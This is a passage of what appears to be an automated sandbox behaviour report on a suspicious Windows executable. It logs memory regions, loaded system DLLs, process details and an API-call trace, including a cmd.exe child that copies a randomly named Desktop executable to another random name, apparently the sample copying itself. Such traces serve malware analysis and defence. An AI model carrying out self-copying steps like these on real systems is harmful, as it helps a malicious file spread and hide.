0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 171 start_va = 0x7fb88000 end_va = 0x7fb88fff entry_point = 0x0 region_type = private name = "private_0x000000007fb88000" filename = "" Region: id = 172 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 173 start_va = 0xec51dd0000 end_va = 0xec51deffff entry_point = 0x0 region_type = private name = "private_0x000000ec51dd0000" filename = "" Region: id = 174 start_va = 0xec51df0000 end_va = 0xec51e03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec51df0000" filename = "" Region: id = 175 start_va = 0xec51e10000 end_va = 0xec51e4ffff entry_point = 0x0 region_type = private name = "private_0x000000ec51e10000" filename = "" Region: id = 176 start_va = 0x7df5ff1e0000 end_va = 0x7ff5ff1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff1e0000" filename = "" Region: id = 177 start_va = 0x7ff7fc700000 end_va = 0x7ff7fc722fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc700000" filename = "" Region: id = 178 start_va = 0x7ff7fc72c000 end_va = 0x7ff7fc72dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc72c000" filename = "" Region: id = 179 start_va = 0x7ff7fc72e000 end_va = 0x7ff7fc72efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc72e000" filename = "" Region: id = 180 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 181 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 182 start_va = 0xec51f40000 end_va = 0xec5203ffff entry_point = 0x0 region_type = private name = "private_0x000000ec51f40000" filename = "" Region: id = 183 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 184 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 185 start_va = 0xec51dd0000 end_va = 0xec51ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec51dd0000" filename = "" Region: id = 186 start_va = 0xec51e50000 end_va = 0xec51f0dfff entry_point = 0xec51e50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 187 start_va = 0xec52040000 end_va = 0xec5207ffff entry_point = 0x0 region_type = private name = "private_0x000000ec52040000" filename = "" Region: id = 188 start_va = 0x7ff7fc600000 end_va = 0x7ff7fc6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc600000" filename = "" Region: id = 189 start_va = 0x7ff7fc72a000 end_va = 0x7ff7fc72bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc72a000" filename = "" Region: id = 190 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 191 start_va = 0xec51de0000 end_va = 0xec51deffff entry_point = 0x0 region_type = private name = "private_0x000000ec51de0000" filename = "" Region: id = 192 start_va = 0xec51f10000 end_va = 0xec51f16fff entry_point = 0x0 region_type = private name = "private_0x000000ec51f10000" filename = "" Region: id = 193 start_va = 0xec51f20000 end_va = 0xec51f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec51f20000" filename = "" Region: id = 194 start_va = 0xec51f30000 end_va = 0xec51f36fff entry_point = 0x0 region_type = private name = "private_0x000000ec51f30000" filename = "" Region: id = 195 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 196 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 197 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 198 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 199 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 200 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 201 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 202 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 203 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 204 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 205 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 206 start_va = 0xec52080000 end_va = 0xec52207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec52080000" filename = "" Region: id = 207 start_va = 0xec52210000 end_va = 0xec52390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec52210000" filename = "" Region: id = 208 start_va = 0xec523a0000 end_va = 0xec5379ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec523a0000" filename = "" Region: id = 209 start_va = 0xec537a0000 end_va = 0xec537a0fff entry_point = 0x0 region_type = private name = "private_0x000000ec537a0000" filename = "" Region: id = 210 start_va = 0xec537b0000 end_va = 0xec537b0fff entry_point = 0x0 region_type = private name = "private_0x000000ec537b0000" filename = "" Region: id = 211 start_va = 0xec537c0000 end_va = 0xec537fffff entry_point = 0x0 region_type = private name = "private_0x000000ec537c0000" filename = "" Region: id = 212 start_va = 0xec53960000 end_va = 0xec5396ffff entry_point = 0x0 region_type = private name = "private_0x000000ec53960000" filename = "" Region: id = 213 start_va = 0x7ff7fc728000 end_va = 0x7ff7fc729fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc728000" filename = "" Region: id = 214 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 215 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 216 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 217 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 218 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 219 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 220 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 221 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 222 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 223 start_va = 0xec51e10000 end_va = 0xec51e4ffff entry_point = 0x0 region_type = private name = "private_0x000000ec51e10000" filename = "" Region: id = 224 start_va = 0xec53800000 end_va = 0xec53803fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec53800000" filename = "" Region: id = 225 start_va = 0xec53870000 end_va = 0xec5387ffff entry_point = 0x0 region_type = private name = "private_0x000000ec53870000" filename = "" Region: id = 226 start_va = 0xec53880000 end_va = 0xec53937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec53880000" filename = "" Region: id = 227 start_va = 0xec53970000 end_va = 0xec53ca6fff entry_point = 0xec53970000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 228 start_va = 0xec53cb0000 end_va = 0xec53ec7fff entry_point = 0x0 region_type = private name = "private_0x000000ec53cb0000" filename = "" Region: id = 229 start_va = 0xec53ed0000 end_va = 0xec540e8fff entry_point = 0x0 region_type = private name = "private_0x000000ec53ed0000" filename = "" Region: id = 230 start_va = 0xec540f0000 end_va = 0xec541f9fff entry_point = 0x0 region_type = private name = "private_0x000000ec540f0000" filename = "" Region: id = 231 start_va = 0xec54200000 end_va = 0xec54410fff entry_point = 0x0 region_type = private name = "private_0x000000ec54200000" filename = "" Region: id = 232 start_va = 0xec54420000 end_va = 0xec54536fff entry_point = 0x0 region_type = private name = "private_0x000000ec54420000" filename = "" Region: id = 233 start_va = 0x7ff7fc72c000 end_va = 0x7ff7fc72dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc72c000" filename = "" Region: id = 234 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 235 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 236 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 237 start_va = 0xec53810000 end_va = 0xec53816fff entry_point = 0x0 region_type = private name = "private_0x000000ec53810000" filename = "" Region: id = 238 start_va = 0xec53820000 end_va = 0xec53824fff entry_point = 0xec53820000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 239 start_va = 0xec53830000 end_va = 0xec53830fff entry_point = 0xec53830000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 240 start_va = 0xec53840000 end_va = 0xec53841fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec53840000" filename = "" Region: id = 241 start_va = 0xec54540000 end_va = 0xec54735fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec54540000" filename = "" Region: id = 242 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 243 start_va = 0xec53850000 end_va = 0xec53850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec53850000" filename = "" Region: id = 244 start_va = 0xec53860000 end_va = 0xec53861fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ec53860000" filename = "" Region: id = 245 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 2 os_tid = 0xb68 Thread: id = 3 os_tid = 0x6ec Thread: id = 4 os_tid = 0x1b4 Thread: id = 5 os_tid = 0x524 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1b6f6000" os_pid = "0x850" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 299 start_va = 0xf50000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 300 start_va = 0xf70000 end_va = 0xf71fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 301 start_va = 0xf80000 end_va = 0xf93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 302 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 303 start_va = 0xfe0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 304 start_va = 0x10e0000 end_va = 0x10e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 305 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 306 start_va = 0x1100000 end_va = 0x1101fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 307 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 308 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 309 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 310 start_va = 0x7e9f0000 end_va = 0x7ea12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9f0000" filename = "" Region: id = 311 start_va = 0x7ea16000 end_va = 0x7ea16fff entry_point = 0x0 region_type = private name = "private_0x000000007ea16000" filename = "" Region: id = 312 start_va = 0x7ea1c000 end_va = 0x7ea1efff entry_point = 0x0 region_type = private name = "private_0x000000007ea1c000" filename = "" Region: id = 313 start_va = 0x7ea1f000 end_va = 0x7ea1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea1f000" filename = "" Region: id = 314 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 315 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 316 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 317 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 318 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 323 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 324 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 325 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 326 start_va = 0x55f0000 end_va = 0x56effff entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 327 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 397 start_va = 0xf50000 end_va = 0xf5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 398 start_va = 0x1110000 end_va = 0x11cdfff entry_point = 0x1110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 399 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 400 start_va = 0x12c0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 401 start_va = 0x5560000 end_va = 0x556ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 402 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 403 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 404 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 405 start_va = 0x7e8f0000 end_va = 0x7e9effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8f0000" filename = "" Region: id = 406 start_va = 0x7ea19000 end_va = 0x7ea1bfff entry_point = 0x0 region_type = private name = "private_0x000000007ea19000" filename = "" Region: id = 407 start_va = 0xf60000 end_va = 0xf63fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 408 start_va = 0xf70000 end_va = 0xf73fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 409 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 410 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 411 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 412 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 413 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 414 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 415 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 416 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 417 start_va = 0x74710000 end_va = 0x74737fff entry_point = 0x74710000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 425 start_va = 0x1230000 end_va = 0x1250fff entry_point = 0x1230000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Thread: id = 9 os_tid = 0x554 [0076.396] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0076.397] __set_app_type (_Type=0x1) [0076.397] __p__fmode () returned 0x77984d6c [0076.397] __p__commode () returned 0x77985b1c [0076.397] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0076.397] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0076.397] GetCurrentThreadId () returned 0x554 [0076.397] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x554) returned 0x84 [0076.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0076.397] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0076.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.412] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dfdac | out: phkResult=0x10dfdac*=0x0) returned 0x2 [0076.412] VirtualQuery (in: lpAddress=0x10dfdb3, lpBuffer=0x10dfd64, dwLength=0x1c | out: lpBuffer=0x10dfd64*(BaseAddress=0x10df000, AllocationBase=0xfe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.412] VirtualQuery (in: lpAddress=0xfe0000, lpBuffer=0x10dfd64, dwLength=0x1c | out: lpBuffer=0x10dfd64*(BaseAddress=0xfe0000, AllocationBase=0xfe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.412] VirtualQuery (in: lpAddress=0xfe1000, lpBuffer=0x10dfd64, dwLength=0x1c | out: lpBuffer=0x10dfd64*(BaseAddress=0xfe1000, AllocationBase=0xfe0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.412] VirtualQuery (in: lpAddress=0xfe3000, lpBuffer=0x10dfd64, dwLength=0x1c | out: lpBuffer=0x10dfd64*(BaseAddress=0xfe3000, AllocationBase=0xfe0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.412] VirtualQuery (in: lpAddress=0x10e0000, lpBuffer=0x10dfd64, dwLength=0x1c | out: lpBuffer=0x10dfd64*(BaseAddress=0x10e0000, AllocationBase=0x10e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0076.412] GetConsoleOutputCP () returned 0x1b5 [0076.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0076.420] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0076.420] _get_osfhandle (_FileHandle=1) returned 0x3c [0076.421] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0076.423] _get_osfhandle (_FileHandle=1) returned 0x3c [0076.424] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0076.430] _get_osfhandle (_FileHandle=1) returned 0x3c [0076.430] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0076.438] _get_osfhandle (_FileHandle=0) returned 0x38 [0076.438] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0076.441] _get_osfhandle (_FileHandle=0) returned 0x38 [0076.442] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0076.455] GetEnvironmentStringsW () returned 0x55f7ec8* [0076.455] FreeEnvironmentStringsA (penv="A") returned 1 [0076.455] GetEnvironmentStringsW () returned 0x55f7ec8* [0076.455] FreeEnvironmentStringsA (penv="A") returned 1 [0076.455] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x10ded10 | out: 